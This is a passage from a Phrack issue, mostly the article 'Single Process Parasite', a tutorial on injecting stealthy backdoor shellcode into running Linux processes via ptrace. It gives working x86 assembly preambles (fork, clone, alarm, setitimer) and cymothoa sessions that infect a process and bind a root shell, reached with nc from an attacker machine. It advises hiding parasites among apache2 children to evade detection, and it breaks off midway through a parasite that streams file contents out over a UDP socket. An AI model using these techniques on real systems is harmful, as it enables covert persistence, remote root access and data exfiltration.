|
X). I owe you big time man :)
|
|
- asciio authors because without this tool I would never have found the
|
|
courage to write the paper
|
|
- The Phrack Staff for publishing it
|
|
|
|
|
|
--[ 9 - References
|
|
|
|
|
|
[R01] http://en.wikipedia.org/wiki/Feistel_cipher
|
|
[R02] http://2009.hack.lu/index.php/ReverseChallenge
|
|
[R03] http://baboon.rce.free.fr/index.php?post/2009/11/20/
|
|
HackLu-Reverse-Challenge
|
|
[R04] http://www.whiteboxcrypto.com
|
|
[R05] "Cryptanalysis of a White Box AES Implementation", Billet et al.
|
|
http://bo.blackowl.org/papers/waes.pdf
|
|
[R06] "Digital content protection: How to crack DRM and make them more
|
|
resistant", Jean-Baptiste Bedrune
|
|
http://esec-lab.sogeti.com/dotclear/public/publications/
|
|
10-hitbkl-drm.pdf
|
|
[R07] "White-Box Cryptography and an AES Implementation", Eisen et al.
|
|
http://www.scs.carleton.ca/%7Epaulv/papers/whiteaes.lncs.ps
|
|
[R08] "White-Box Cryptography and SPN ciphers", Schelkunov
|
|
http://eprint.iacr.org/2010/419.pdf
|
|
[R09] "A White-box DES Implementation for DRM Applications", Chow et al.
|
|
http://www.scs.carleton.ca/%7Epaulv/papers/whitedes1.ps
|
|
[R10] "White-Box Cryptography", James Muir, Irdeto
|
|
http://www.mitacs.ca/events/images/stories/focusperiods/
|
|
security-presentations/jmuir-mitacs-white-box-cryptography.pdf
|
|
[R11] http://search.cpan.org/dist/App-Asciio/lib/App/Asciio.pm#NAME
|
|
[R12] http://dhost.info/pasjagor/des/start.php
|
|
[R13] "Cryptography: Theory and Practice", D. Stinson, 1st edition
|
|
[R14] "Clarifying Obfuscation: Improving the Security of White-Box
|
|
Encoding", Link et al.
|
|
http://eprint.iacr.org/2004/025.pdf
|
|
[R15] "White-Box Cryptography" (PhD thesis), B. Wyseur
|
|
https://www.cosic.esat.kuleuven.be/publications/thesis-152.pdf
|
|
[R16] "Attacking an obfuscated cipher by injecting faults", Jacob et al.
|
|
http://www.cs.princeton.edu/~mjacob/papers/drm1.pdf
|
|
[R17] "Cryptanalysis of White-Box DES Implementations with Arbitrary
|
|
External Encodings", B. Wyseur
|
|
http://eprint.iacr.org/2007/104.pdf
|
|
|
|
|
|
--[ EOF
|
|
|
|
==Phrack Inc.==
|
|
|
|
Volume 0x0e, Issue 0x44, Phile #0x09 of 0x13
|
|
|
|
|=-----------------------------------------------------------------------=|
|
|
|=---------------------=[ Single Process Parasite ]=---------------------=|
|
|
|=----------------=[ The quest for the stealth backdoor ]=---------------=|
|
|
|=-----------------------------------------------------------------------=|
|
|
|=--------------------------=[ by Crossbower ]=--------------------------=|
|
|
|=-----------------------------------------------------------------------=|
|
|
|
|
Index
|
|
|
|
------[ 0. Introduction
|
|
------[ 1. Brief discussion on injection methods
|
|
------[ 2. First generation: fork() and clone()
|
|
------[ 3. Second generation: signal()/alarm()
|
|
------[ 4. Third generation: setitimer()
|
|
------[ 5. Working parasites
|
|
------------[ 5.1 Process and thread backdoor
|
|
------------[ 5.2 Remote "tail follow" parasite
|
|
------------[ 5.3 Single process backdoor
|
|
------[ 6. Something about the injector
|
|
------[ 7. Further readings
|
|
------[ 8. Links and references
|
|
|
|
------[ 0. Introduction
|
|
|
|
In biology a parasite is an organism that grows, feeds, and live in a
|
|
different organism while contributing nothing to the survival of its host.
|
|
|
|
(There is another interesting definition that, even if it's less relevant,
|
|
I find funny: a professional dinner guest, especially in ancient Greece.
|
|
>From Greek parastos, person who eats at someone else's table,
|
|
parasite : para-,beside; stos, grain, food.)
|
|
|
|
So, without digressing too much, what do we mean by "parasite" in this
|
|
document? A parasite is simply some executable code that lives within
|
|
another process, but that was injected after its loading time, by a
|
|
third person/program.
|
|
|
|
Any process can become infected quite easily, using standard libraries
|
|
provided by operating systems (we will use process trace, ptrace [0]).
|
|
|
|
The real difficulty for the parasite is to coexist peacefully with the host
|
|
process, without killing it. For "death" of the host we also intend a
|
|
situation where, even if the process remains active, it is no longer
|
|
able to work properly, because its memory has been corrupted.
|
|
|
|
The of goal this document is to create a parasite that live and let live
|
|
the host process, as if nothing had happened.
|
|
|
|
Starting with simple techniques, and and gradually improving the parasite,
|
|
we'll reach a point where our creature is scheduled inside the process of
|
|
the host, without the need of fork() or similar calls (i.e. clone()).
|
|
|
|
An interesting question is: why a parasite is an excellent backdoor?
|
|
|
|
The simplest answer is that a parasite hides what is not permitted in what
|
|
is allowed, so that:
|
|
- it's difficult to detect using conventional tools
|
|
- it's more stable and easy to use than kernel-level rootkits.
|
|
|
|
If the target system has security tools that automatically monitor the
|
|
integrity of executable files, but that do not perform complete audits of
|
|
memory, the parasite will not trigger any alarm.
|
|
|
|
After this introduction we can dive into the problematic.
|
|
|
|
If you prefer practical examples, you can "jump" to paragraph 5,
|
|
which shows three different types of real parasite.
|
|
|
|
------[ 1. Brief discussion on injection methods
|
|
|
|
To separate the creation of the shellcode from the methods used to inject
|
|
it into the host process, this section will discuss how the parasite is
|
|
injected (in the examples of this document).
|
|
|
|
Unlike normal shellcode that, depending on the vulnerability exploited,
|
|
can not contain certain types of characters (e.g. NULLs), a parasite has
|
|
no particular restrictions.
|
|
|
|
It can contain any character, even NULL bytes, because ptrace [0] allows to
|
|
modify directly the .text section of a process.
|
|
|
|
The first question that arises regards where to place parasitic code.
|
|
This memory location must not be essential to the program, and should not
|
|
be invoked by the code after the start (or shortly after the start) of
|
|
the host process.
|
|
|
|
We can use run-time patching, but it's complicated technique and makes it
|
|
difficult to ensure the correct functioning of the process after the
|
|
manipulation. It is therefore not suitable for complex parasites.
|
|
|
|
The author has chosen to inject the code into the memory range of libdl.so
|
|
library, since it is used during the loading stage of programs but then
|
|
usually no longer necessary (more info: [1][2]).
|
|
|
|
Another reason for this choice is that the memory address of the library,
|
|
when loaded into the process, is exported in the /proc filesystem.
|
|
|
|
You can easily see that by typing:
|
|
$ cat /proc/self/maps
|
|
...
|
|
b7778000-b777a000 rw-p 00139000 fe:00 37071197 /lib/libc-2.7.so
|
|
b777a000-b777d000 rw-p b777a000 00:00 0
|
|
...
|
|
b7782000-b779c000 r-xp 00000000 fe:00 37071145 /lib/ld-2.7.so <---
|
|
...
|
|
|
|
Libdl is mapped at the range b7782000-b779c000 and is executable. The
|
|
injected starting at the initial address of the range is perfectly
|
|
executable.
|
|
|
|
Some considerations about this method: if the infected program uses
|
|
dlopen(), dlclose() or dlsym() during its execution, some problems
|
|
could arise. The solution is to inject into the same library, but in
|
|
unused memory locations.
|
|
(From the tests of the author the initial memory locations of the library
|
|
are not critical and do not affect the execution of programs.)
|
|
|
|
There are other problems on linux systems that use the grsec kernel patch.
|
|
Using this patch the text segment of the host process is marked
|
|
read/execute only and therefore will not be writable with ptrace.
|
|
If that's your case, Ryan O'Neill has published a very powerful
|
|
algorithm [3] that exploits sysenter instructions (used by the host's code)
|
|
to execute a serie of system calls (the algorithm is able to
|
|
allocate and set the correct permission on a new memory area without
|
|
modifying the text segment of the traced process).
|
|
I recommend everyone read the document, as it is very interesting.
|
|
|
|
The other premise, I want to do in this section, regards the basic
|
|
informations the injector (the program that injects the parasite) must
|
|
provide to the shellcode to restore the execution of the host program.
|
|
|
|
Our implementation of the injector gets the current EIP (Instruction
|
|
Pointer) of the host process, push it on the stack and writes in the EIP
|
|
the address of the parasite (injected into libdl).
|
|
|
|
The parasite, in its initialization part, saves every register it uses.
|
|
Then, at the end of its execution, every modified register is restored.
|
|
A simple way to do this is to push and pop the registers with the
|
|
instructions PUSHA and POPA.
|
|
|
|
After that, a simple RET instruction restores the execution of the host
|
|
process, since the its saved EIP is on the top of the stack.
|
|
|
|
%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%
|
|
|
|
parasite_skeleton:
|
|
|
|
# preamble
|
|
push %eax # save registers
|
|
push %ebx # used by the shellcode
|
|
|
|
# ...
|
|
# shellcode
|
|
# ...
|
|
|
|
# epilogue
|
|
pop %ebx # restore modified registers
|
|
pop %eax # ...
|
|
|
|
ret # restore execution of the host
|
|
|
|
%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%
|
|
|
|
Another very useful information the injector provides to the shellcode,
|
|
is the address of a persistent memory location. In the case of this
|
|
document, the address is also taken from /proc/pid/maps:
|
|
|
|
...
|
|
b7701000-b771c000 r-xp 00000000 08:03 1261592 /lib/ld-2.11.1.so
|
|
b771c000-b771d000 r--p 0001a000 08:03 1261592 /lib/ld-2.11.1.so
|
|
b771d000-b771e000 rw-p 0001b000 08:03 1261592 /lib/ld-2.11.1.so <--
|
|
...
|
|
|
|
The range b771d000-b771e000 has read and write permission and it's
|
|
suitable for this purpose.
|
|
|
|
Other techniques exists to dynamically create writable and executable
|
|
memory locations, such as the use of mmap() in the host process. But these
|
|
techniques are beyond the scope of this article and will not be analyzed
|
|
here.
|
|
|
|
Since the necessary premises have been made, we can discuss the first
|
|
generation of our stealth parasite.
|
|
|
|
------[ 2. First generation: fork() and clone()
|
|
|
|
The simplest idea to allow the host process to continue its execution
|
|
properly and, at the same time, hide the parasite, is the use of the
|
|
fork() syscall (or the creation of a new thread, not analyzed here).
|
|
|
|
Using fork() the process is splitted in two:
|
|
- the parent process (the original one) can continue its normal execution
|
|
- the child process, instead, will execute the parasite
|
|
|
|
An important thing to note, is that the child process inherits the parent's
|
|
name and a copy of its memory.
|
|
|
|
This means that if we inject the parasite in the process "server1",
|
|
another process "server1" will be created as its child.
|
|
|
|
Before the injection:
|
|
# ps -A
|
|
...
|
|
...
|
|
5478 ? 00:00:00 server1
|
|
...
|
|
|
|
After the injection:
|
|
# ps -A
|
|
...
|
|
...
|
|
5478 ? 00:00:00 server1
|
|
5479 ? 00:00:00 server1
|
|
...
|
|
|
|
If the host process is carefully chosen, the parasite will be very hard
|
|
to detect. Just think of some network services (such as apache2) that
|
|
generate a lot of children: a single child process is unlikely to be
|
|
detected.
|
|
|
|
The fork parasite can be implemented as a preamble preceding the real
|
|
shellcode:
|
|
|
|
%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%
|
|
|
|
fork_parasite:
|
|
push %eax # save %eax value (needed by parent process)
|
|
|
|
push $2
|
|
pop %eax
|
|
int $0x80 # fork
|
|
|
|
test %eax, %eax
|
|
jz shellcode # child: jumps to shellcode
|
|
|
|
pop %eax # parent: restores host process execution
|
|
ret
|
|
|
|
shellcode: # append your shellcode here
|
|
# ...
|
|
# ...
|
|
|
|
%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%
|
|
|
|
The preamble simply makes a call to fork(), analyzes the results, and
|
|
decides the execution path to choose.
|
|
|
|
With this implementation, any existing shellcode can be turned into a
|
|
parasite: it's responsibility of the injector to concatenate the parts
|
|
before inserting them in the host.
|
|
|
|
A very similar technique uses clone() instead of fork(). We can consider
|
|
clone() a generalization of the fork() syscall through which it's possible
|
|
to create both processes and threads.
|
|
|
|
The difference is in the options passed to the syscall. A thread is
|
|
generated using particular flags:
|
|
|
|
- CLONE_VM the calling process and the child process run in the same
|
|
memory space. Memory writes performed by the calling process
|
|
or by the child process are also visible in the other
|
|
process.
|
|
Any memory mapping or unmapping performed by the child or
|
|
the calling process also affects the other process.
|
|
|
|
- CLONE_SIGHAND the calling process and the child process share the same
|
|
table of signal handlers.
|
|
|
|
- CLONE_THREAD the child is placed in the same thread group as the
|
|
calling process.
|
|
|
|
The CLONE_THREAD flag is the most important: it is what distinguishes what
|
|
we call the "process" from what we call "thread" at least on linux systems.
|
|
|
|
Let's see how the clone() preamble is implemented:
|
|
|
|
%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%
|
|
|
|
clone_parasite:
|
|
pusha # save registers (needed by parent process)
|
|
|
|
# call to sys_clone
|
|
|
|
xorl %eax, %eax
|
|
mov $120, %al
|
|
|
|
movl $0x18900, %ebx # flags: CLONE_VM|CLONE_SIGHAND|
|
|
# CLONE_THREAD|CLONE_PARENT
|
|
|
|
int $0x80 # clone
|
|
|
|
test %eax, %eax
|
|
jz shellcode # child: jumps to shellcode
|
|
|
|
popa # parent: restores host process execution
|
|
ret
|
|
|
|
shellcode: # append your shellcode here
|
|
# ...
|
|
# ...
|
|
|
|
%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%
|
|
|
|
The code is based on the fork() preamble, and its behaviour is very
|
|
similar. The difference is in the result.
|
|
|
|
Before the injection (single threaded process):
|
|
# ps -Am
|
|
...
|
|
...
|
|
8360 pts/3 00:00:00 server1
|
|
- - 00:00:00 -
|
|
...
|
|
|
|
After the injection (an additional thread is created):
|
|
# ps -A
|
|
...
|
|
...
|
|
8360 pts/3 00:00:00 server1
|
|
- - 00:00:00 -
|
|
- - 00:00:00 -
|
|
...
|
|
|
|
Surely the generation of a thread is more stealthy than the generation of a
|
|
process. However there is a small disadvantage, if the parasite thread
|
|
alters parts of the main thread can bring the host to a crash:
|
|
the use of the resources, that are shared, must be much more careful.
|
|
|
|
We have just seen how to create parasites executed as independent processes
|
|
or threads.
|
|
|
|
However, these types of parasites are not completely invisible. In some
|
|
circumstances, and in the case of particular (monitored) processes, the
|
|
generation of a child (process or thread) can be problematic or easily
|
|
detectable.
|
|
|
|
Therefore, in the next section, we will discuss in a different type of
|
|
parasite/preamble, deeply integrated with its host.
|
|
|
|
------[ 3. Second generation: signal()/alarm()
|
|
|
|
If we don't like the creation of another process to execute our parasite
|
|
we need some kind of time sharing mechanism inside a single process (did
|
|
you see the title of this document?)
|
|
|
|
It's a scheduling problem: when a new process is created, the operating
|
|
system takes care of assigning it time and resources necessary to its
|
|
execution.
|
|
If we don't want to rely on this mechanism, we have to simulate a scheduler
|
|
within a single process, to allow a concurrent execution of parasite and
|
|
host, using (usually) asynchronous events.
|
|
|
|
When you think of asynchronous events in a Unix-like system, the first
|
|
thing that comes to mind are signals.
|
|
If a process registers a handler for a specific signal, when the signal
|
|
is sent the operating system stops its normal execution and makes a
|
|
(void function) call to the handler.
|
|
When the handler returns, the execution of the process is restored.
|
|
|
|
There are several functions provided by the operating system to generate
|
|
signals. In this chapter we'll use alarm().
|
|
|
|
Alarm() arranges for a SIGALRM signal to be delivered to the calling
|
|
process when an arbitrary number of seconds has passed.
|
|
Its main limitation is that you can not specify time intervals shorter than
|
|
one second, but this is not a problem in most cases.
|
|
|
|
Our parasite/preamble needs to register itself as a handler for the signal
|
|
SIGALRM, and renew the timer every time it is executed, to be called at
|
|
regular intervals.
|
|
This creates a kind of scheduler within a single process, and there is no
|
|
the need to call fork() (or functions to create threads).
|
|
|
|
Here is our second generation parasite/preamble:
|
|
|
|
%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%
|
|
|
|
# signal/alarm parasite
|
|
|
|
handler:
|
|
pusha
|
|
# alarm(timeout)
|
|
xorl %eax, %eax
|
|
xorl %ebx, %ebx
|
|
mov $27, %al
|
|
mov $0x1, %bl # 1 second
|
|
int $0x80
|
|
|
|
schedule:
|
|
# signal(SIGALRM, handler)
|
|
xorl %eax, %eax
|
|
xorl %ebx, %ebx
|
|
mov $48, %al
|
|
mov $14, %bl
|
|
jmp schedule_end # load schedule_end address
|
|
load_handler:
|
|
pop %ecx
|
|
subl $0x23, %ecx # adjust %ecx to point handler()
|
|
int $0x80
|
|
popa
|
|
jmp shellcode
|
|
|
|
schedule_end:
|
|
call load_handler
|
|
|
|
shellcode: # append your shellcode here
|
|
# ...
|
|
# ...
|
|
|
|
%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%
|
|
|
|
Of course the type of shellcode you can append to the preamble must
|
|
be aware of the "alternative" scheduling mechanism.
|
|
|
|
It must be able to split its operations between multiple calls, and must
|
|
also not take too much time to run a single step (i.e. a single call),
|
|
to not slow down the host program or overlap with the next handler call.
|
|
|
|
In short, a call to the handler (our parasite), to work properly must last
|
|
less than the timer interval.
|
|
|
|
However, alert() is not the only function able to simulate a scheduler.
|
|
In the next chapter we will see a more advanced function, which allows a
|
|
more granular control of the execution of the parasite.
|
|
|
|
------[ 4. Third generation: setitimer()
|
|
|
|
We've just arrived at the latest generation of the parasite.
|
|
In the first part of the chapter we'll spend some time to analyze the
|
|
function setitimer(), on which the code is based.
|
|
|
|
The definition of the function is:
|
|
int setitimer(int which, const struct itimerval *new_value,
|
|
struct itimerval *old_value);
|
|
|
|
As in the case of alarm(), the function setitimer() provides a mechanism
|
|
for a process to interrupt itself in the future using signals.
|
|
Unlike alarm, however, you can specify intervals of a few microseconds and
|
|
choose various types of timers and time domains.
|
|
|
|
The argument "int which" allows to choose the type of timer and therefore
|
|
the signal that will be sent to the process:
|
|
|
|
ITIMER_REAL 0x00 the most used timer, it decrements in real time, and
|
|
delivers SIGALRM upon expiration.
|
|
|
|
ITIMER_VIRTUAL 0x01 decrements only when the process is executing, and
|
|
delivers SIGVTALRM upon expiration.
|
|
|
|
ITIMER_PROF 0x02 decrements both when the process executes and when the
|
|
system is executing on behalf of the process. Coupled
|
|
with ITIMER_VIRTUAL, this timer is usually used to
|
|
profile the time spent by the application in user and
|
|
kernel space. SIGPROF is delivered upon expiration.
|
|
|
|
We will use ITIMER_REAL because it allows the generation of signal at
|
|
regular intervals, and is not influenced by environmental factors such as
|
|
the workload of a system.
|
|
|
|
The argument "const struct itimerval *new_value" points to an itimerval
|
|
structure, defined as:
|
|
|
|
struct itimerval {
|
|
struct timeval it_interval; /* next value */
|
|
struct timeval it_value; /* current value */
|
|
};
|
|
|
|
struct timeval {
|
|
long tv_sec; /* seconds */
|
|
long tv_usec; /* microseconds */
|
|
};
|
|
|
|
The last timeval structure, it_value, is the period between the calling of
|
|
the function and the first timer interrupt. If zero, the alarm is disabled.
|
|
|
|
The second one, it_interval, is the period between successive timer
|
|
interrupts. If zero, the alarm will only be sent once.
|
|
|
|
We'll set both structures at the same time interval.
|
|
|
|
The last argument, "struct itimerval *old_value", if not NULL, will be set
|
|
by the function at the value of the previous timer. We'll not use this
|
|
feature.
|
|
|
|
%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%
|
|
|
|
# setitimer parasite
|
|
|
|
setitimer_hdr:
|
|
pusha
|
|
# sys_setitimer(ITIMER_REAL, *struct_itimerval, NULL)
|
|
xorl %eax, %eax
|
|
xorl %ebx, %ebx
|
|
xorl %edx, %edx
|
|
mov $104, %al
|
|
jmp struct_itimerval # load itimervar structure
|
|
load_struct:
|
|
pop %ecx
|
|
int $0x80
|
|
popa
|
|
jmp handler
|
|
|
|
struct_itimerval:
|
|
call load_struct
|
|
# itimerval structure: you can modify the values
|
|
# to set your time intervals
|
|
.long 0x0 # seconds
|
|
.long 0x5000 # microseconds
|
|
.long 0x0 # seconds
|
|
.long 0x5000 # microseconds
|
|
|
|
# signal handler, called by the timer
|
|
handler:
|
|
pusha
|
|
# signal(SIGALRM, handler)
|
|
xorl %eax, %eax
|
|
xorl %ebx, %ebx
|
|
mov $48, %al
|
|
mov $14, %bl
|
|
jmp handler_end # load handler_end address
|
|
load_handler:
|
|
pop %ecx
|
|
subl $0x19, %ecx # adjust %ecx to point handler()
|
|
int $0x80
|
|
popa
|
|
jmp shellcode
|
|
|
|
handler_end:
|
|
call load_handler
|
|
|
|
shellcode: # append your shellcode here
|
|
# ...
|
|
# ...
|
|
|
|
%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%
|
|
|
|
The usage of this preamble is similar to the previous (alarm) one, there
|
|
is only the necessity of a fine-tuned timer: a compromise between the
|
|
frequency of executions and the stability of the parasite, which must be
|
|
able to carry out its operations in less time than a timer's cycle.
|
|
|
|
You can work around this problem by transforming these preambles
|
|
(including the preamble that makes use of alarm()) in epilogues, so that
|
|
the timer starts counting only after the parasite has finished its
|
|
operations.
|
|
|
|
In fact we are going to see how this was implemented in the real parasites
|
|
presented below.
|
|
|
|
------[ 5. Working parasites
|
|
|
|
Here we come to the practical part. Three working parasites will be
|
|
presented: one for each technique exposed in the theoretical part of the
|
|
document.
|
|
|
|
To inject the parasites the injector cymothoa [4] was used, written by the
|
|
same author, and which already includes the codes presented in the article.
|
|
Although it is possible, through various techniques, to inject shellcodes
|
|
in processes, the download of the program is recommended to try the
|
|
examples during the lecture.
|
|
|
|
------------[ 5.1 Process and thread backdoor
|
|
|
|
Our first real parasite is a backdoor created by applying, to pre-existing
|
|
shellcode, the fork() preamble.
|
|
The shellcode used was developed by izik (izik@tty64.org) and is
|
|
available on several sites [5]. For this reason will not be reported.
|
|
|
|
The shellcode is a classic exploit shellcode: it binds /bin/sh to a TCP
|
|
port and fork a shell for every connection.
|
|
|
|
Using it aided by an injector, has several advantages:
|
|
- The ability to configure its behavior. In this case the possibility to
|
|
choose the port to listen on.
|
|
- The possibility of keeping the host alive using a one of the
|
|
preamble shown earlier.
|
|
- Not having to worry about memory locations necessary to the execution
|
|
and data storage, since they are automatically provided.
|
|
|
|
Let's see in practice how this parasite works...
|
|
|
|
First, on the victim machine, we must identify a suitable host process.
|
|
In this example we will use an instance of cat, since it's really easy to
|
|
check if it continues its execution after the injection.
|
|
|
|
root@victim# ps -A | grep cat
|
|
1727 pts/6 00:00:00 cat
|
|
|
|
We need this pid for the injection:
|
|
|
|
root@victim# cymothoa -p 1727 -s 1 -y 5555
|
|
[+] attaching to process 1727
|
|
|
|
register info:
|
|
-----------------------------------------------------------
|
|
eax value: 0xfffffe00 ebx value: 0x0
|
|
esp value: 0xbf81e1c8 eip value: 0xb78be430
|
|
------------------------------------------------------------
|
|
|
|
[+] new esp: 0xbf81e1c4
|
|
[+] payload preamble: fork
|
|
[+] injecting code into 0xb78bf000
|
|
[+] copy general purpose registers
|
|
[+] detaching from 1727
|
|
|
|
[+] infected!!!
|
|
root@victim#
|
|
|
|
The process is now infected: we should be able to see two cat instances,
|
|
the original one and the new one that corresponds to the parasite:
|
|
|
|
root@victim# ps -A | grep cat
|
|
1727 pts/6 00:00:00 cat
|
|
1842 pts/6 00:00:00 cat
|
|
|
|
If, from a different machine, we try to connect to the port 5555, we should
|
|
get a shell:
|
|
|
|
root@attacker# nc -vv victim 5555
|
|
Connection to victim 5555 port [tcp/*] succeeded!
|
|
uname -a
|
|
Linux victim 2.6.38 #1 SMP Thu Mar 17 20:52:18 EDT 2011 i686 GNU/Linux
|
|
whoami
|
|
root
|
|
|
|
At the same time, if we write a few lines in the console where the original
|
|
cat is running, we should see the usual output:
|
|
|
|
root@victim# cat
|
|
test123
|
|
test123
|
|
foo
|
|
foo
|
|
|
|
The backdoor function properly: the two processes are running at the same
|
|
time without crashing...
|
|
|
|
The same backdoor can also be injected in a similar way using the clone()
|
|
preamble, and thus running the parasite as a new thread instead of a new
|
|
process.
|
|
|
|
The command is similar, we only disable the fork() preamble and force
|
|
clone() instead:
|
|
|
|
root@victim# cymothoa -p 9425 -s 1 -y 5555 -F -b
|
|
[+] attaching to process 9425
|
|
|
|
register info:
|
|
-----------------------------------------------------------
|
|
eax value: 0xfffffe00 ebx value: 0x0
|
|
esp value: 0xbfb4beb8 eip value: 0xb78da430
|
|
------------------------------------------------------------
|
|
|
|
[+] new esp: 0xbfb4beb4
|
|
[+] payload preamble: thread
|
|
[+] injecting code into 0xb78db000
|
|
[+] copy general purpose registers
|
|
[+] detaching from 9425
|
|
|
|
[+] infected!!!
|
|
|
|
If we execute ps without special flags we now see only one process:
|
|
|
|
root@victim# ps -A | grep cat
|
|
9425 pts/3 00:00:00 cat
|
|
|
|
But with the option -m we see an additional thread:
|
|
|
|
root@victim# ps -Am
|
|
...
|
|
9425 pts/3 00:00:00 cat
|
|
- - 00:00:00 -
|
|
- - 00:00:00 -
|
|
...
|
|
...
|
|
|
|
Using netcat on the port 5555 of the victim machine works as expected.
|
|
|
|
Some notes on the proper use of the fork() and clone() preambles:
|
|
- This preamble is compatible with virtually any existing shellcode,
|
|
without any modification. It can be used to easily transform into
|
|
parasitic code what you have already written.
|
|
In the case of clone() preamble the situation is slightly more critical
|
|
because there is the possibility that the parasite thread interferes
|
|
with the host thread. However, widespread shellcodes are usually
|
|
already attentive to these issues, and should not cause problems.
|
|
- It is better to inject the parasite into servers that generate many
|
|
child processes. Some of those tested by me are apache2, dhclient3 and,
|
|
in the case of a desktop system, the processes of the window manager.
|
|
It's hard to find a needle in a haystack, and it is difficult to tell
|
|
a single parasite from dozens of apache2 processes ;)
|
|
|
|
------------[ 5.2 Remote "tail follow" parasite
|
|
|
|
Have you ever used tail with the "-f" (follow) option? This mode is used
|
|
to monitor text files, usually logs, to see in real time the new lines
|
|
added by other processes.
|
|
|
|
Tail accepts as option a sleep interval, a waiting time between a
|
|
control of the file and another.
|
|
|
|
It's therefore natural, when writing a parasite with the same function, to
|
|
use a preamble that allows a precise control of time: the setitimer()
|
|
preamble.
|
|
|
|
This is the code of this new parasite... It is more complex than the
|
|
previous codes.
|
|
After the source there will be a brief explanation of its operations, and
|
|
finally an example of its practical use.
|
|
|
|
%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<
|
|
|
|
#
|
|
# Scheduled tail setitimer parasite
|
|
#
|
|
|
|
#
|
|
# Preamble
|
|
#
|
|
|
|
setitimer_hdr:
|
|
pusha
|
|
# sys_setitimer(ITIMER_REAL, *struct_itimerval, NULL)
|
|
xorl %eax, %eax
|
|
xorl %ebx, %ebx
|
|
xorl %edx, %edx
|
|
mov $104, %al
|
|
jmp struct_itimerval
|
|
load_struct:
|
|
pop %ecx
|
|
int $0x80
|
|
popa
|
|
jmp handler
|
|
|
|
struct_itimerval:
|
|
call load_struct
|
|
# these values are replaced by the injector:
|
|
.long 0x0#53434553 # seconds
|
|
.long 0x5343494d # microseconds
|
|
.long 0x0#53434553 # seconds
|
|
.long 0x5343494d # microseconds
|
|
|
|
handler:
|
|
pusha
|
|
# signal(SIGALRM, handler)
|
|
xorl %eax, %eax
|
|
xorl %ebx, %ebx
|
|
mov $48, %al
|
|
mov $14, %bl
|
|
jmp handler_end
|
|
load_handler:
|
|
pop %ecx
|
|
subl $0x19, %ecx # adjust %ecx to point handler()
|
|
int $0x80
|
|
popa
|
|
jmp shellcode
|
|
|
|
handler_end:
|
|
call load_handler
|
|
#
|
|
# The shellcode starts here
|
|
#
|
|
|
|
shellcode:
|
|
pusha
|
|
|
|
# check if already initialized
|
|
mov $0x4d454d50, %esi # replaced by the injector
|
|
# (persistent memory address)
|
|
mov (%esi), %eax
|
|
cmp $0xdeadbeef, %eax
|
|
je open_call # jump if already initialized
|
|
|
|
# initialize
|
|
mov $0xdeadbeef, %eax
|
|
mov %eax, (%esi)
|
|
add $4, %esi
|
|
xorl %eax, %eax
|
|
mov %eax, (%esi)
|
|
sub $4, %esi
|
|
|
|
open_call:
|
|
# call to sys_open(file_path, O_RDONLY)
|
|
xorl %eax, %eax
|
|
mov $5, %al
|
|
jmp file_path
|
|
load_file_path:
|
|
pop %ebx
|
|
xorl %ecx, %ecx
|
|
int $0x80 # %eax = file descriptor
|
|
mov %eax, %edi # save file descriptor
|
|
|
|
check_file_length:
|
|
# call to sys_lseek(fd, 0, SEEK_END)
|
|
mov %edi, %ebx
|
|
xorl %eax, %eax
|
|
mov $19, %al
|
|
xorl %ecx, %ecx
|
|
xorl %edx, %edx
|
|
mov $2, %dl
|
|
int $0x80 # %eax = end of file offset (eof)
|
|
|
|
# get old eof, and store new eof
|
|
add $4, %esi
|
|
mov (%esi), %ebx
|
|
mov %eax, (%esi)
|
|
|
|
# skip the first read
|
|
test %ebx, %ebx
|
|
jz return_to_main_proc
|
|
|
|
# check if file is larger
|
|
# (current end of file > previous end of file)
|
|
cmp %eax, %ebx
|
|
je return_to_main_proc # eof not changed:
|
|
# return to main process
|
|
|
|
calc_data_len:
|
|
# calculate new data length
|
|
# (current eof - last eof)
|
|
mov %eax, %esi
|
|
sub %ebx, %esi # saved in %esi
|
|
|
|
set_new_position:
|
|
# call to sys_lseek(fd, last_eof, SEEK_SET)
|
|
xorl %eax, %eax
|
|
mov $19, %al
|
|
mov %ebx, %ecx
|
|
mov %edi, %ebx
|
|
xorl %edx, %edx
|
|
int $0x80 # %eax = last end of file offset
|
|
|
|
read_file_tail:
|
|
# allocate buffer
|
|
sub %esi, %esp
|
|
|
|
# call to sys_read(fd, buf, count)
|
|
xorl %eax, %eax
|
|
mov $3, %al
|
|
mov %edi, %ebx
|
|
mov %esp, %ecx
|
|
mov %esi, %edx
|
|
int $0x80 # %eax = bytes read
|
|
mov %esp, %ebp # save pointer to buffer
|
|
|
|
open_socket:
|
|
# call to sys_socketcall($0x01 (socket), *args)
|
|
xorl %eax, %eax
|
|
mov $102, %al
|
|
xorl %ebx, %ebx
|
|
mov $0x01, %bl
|
|
jmp socket_args
|
|
load_socket_args:
|
|
pop %ecx
|
|
int $0x80 # %eax = socket descriptor
|
|
jmp send_data
|
|
|
|
socket_args:
|
|
call load_socket_args
|
|
.long 0x02 # AF_INET
|
|
.long 0x02 # SOCK_DGRAM
|
|
.long 0x00 # NULL
|
|
|
|
send_data:
|
|
|
|
